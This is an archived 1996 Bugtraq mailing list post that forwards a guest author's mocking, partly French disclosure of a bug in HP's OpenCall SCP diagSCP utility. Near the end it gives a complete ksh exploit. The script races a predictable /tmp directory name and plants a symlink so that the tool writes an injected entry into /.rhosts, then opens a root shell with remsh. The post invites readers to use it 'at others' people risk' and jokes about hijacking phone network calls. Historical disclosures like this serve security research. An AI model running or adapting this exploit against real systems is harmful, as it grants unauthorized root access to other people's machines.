Bugtraq mailing list archives
Other Folks Scripts
From: aleph1 () dfw net (Aleph One)
Date: Mon, 9 Dec 1996 02:50:35 -0600
Guest Scriptor: Otto Sync Exploit: OpenCall platform bug Shout out: Thanks, Otto, we couldn't have said it better ourselves! Sure you all see Hewlett Packard as the pure American company, and you blame all these Yankee coders for the bugs that we see here week after week. Grossihre erreur ! la connerie est distribuie uniformiment.Today we're going to investigate the French arm of HP, located in Grenoble in the Alps, in this division where the most elite products come from: the Telecommunication Network Organisation. Coucou ` tous les Grenoblois ! Near the mountains are developed products such as their IN (Intelligent Network) platforms, and the OpenCall SCP software is being written by half drunk French skiers who thought HP stands for "Habitation Prolongie" (long term accommodation). Sans blague, arretez l*alcool entre midi et deux, iteignez ce minitel connecti sur 3615 ANALSEX et pensez ` tous ces Opirateurs en danger ` cause de vos pratiques de programmation douteuses. Shall we tell you that HP delivers their IN platform with umask 000 as a default and don*t see this as a problem ? Les cons ! Do you want to know how some of their log files keep being 666 and want to overwrite any the root*s files ? Si si, c*est vrai ! No, let*s deal with something more fancy, the guys at SOD would be disappointed to see such trivial exploits. Ils ont plus d*un tour dans leur sac, ces sacris scripteurs. While I*m here as a guest scriptor, one word for HP executives and lawyers. Oui, mjme ceux qui ` Grenoble pensent concentrer toute l*intelligence humaine en un seul endroit. Make the SOD guys a decent offer, give them some contract work to start with, maybe a nice package with a Maserati company car and one all-year ski pass. Bon, d*accord, ca peut jtre une voiture francaise mais pas une Citrokn. Think about all the unreleased bugs ! Think about your children ! Think about endangered species ! Soyez raisonnables, vous allez bien leur trouver une petite place bien au chaud avec vue sur le Mont Blanc. La survie de l*humaniti est en jeu. Revenons-en au bug si vous le voulez bien. All right it*s not every day that you come across a SCP but remember that most phone network operators have or will have one. And when you know that this gentle high-available system can control every signalling message at various detection points in the call model, you start to wonder. What about creating a special IN service that entitles all your outgoing calls to a 99% charging discount ? Would you have fun rerouting all calls directed at the police station to HP*s helpdesk ? Est-ce que vous rialisez enfin que votre code ` la vite-fait met en danger la stabiliti des riseaux sur lesquels ils sont installis ? Have a look at the code. It*s self-explanatory. Use at others* people risk. _________________________________________________________________ BUG1: diagSCP Synopsis ======== The diagSCP utility creates a temporary directory in /tmp with a predictable name. It will also happily follow any evil symlink you put in. The 'env' file created by diagSCP in this directory contains the user's environment and is thus subject to customization. We just have to insert some ^J in a variable to have it go to the next line, so it looks like a valid entry in .rhosts Exploit ======= #!/bin/ksh FILE=/.rhosts NEXT=`expr $$ + 5` mkdir /tmp/diagSCP.$NEXT ln -s $FILE /tmp/diagSCP.$NEXT/env export GUESSWHAT=" localhost `whoami`" diagSCP & sleep 2 kill $NEXT echo "\nFrench kiss ? root kiss !\n" remsh localhost -l root ksh -i Aleph One / aleph1 () dfw net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
Current thread:
- Other Folks Scripts Aleph One (Dec 09)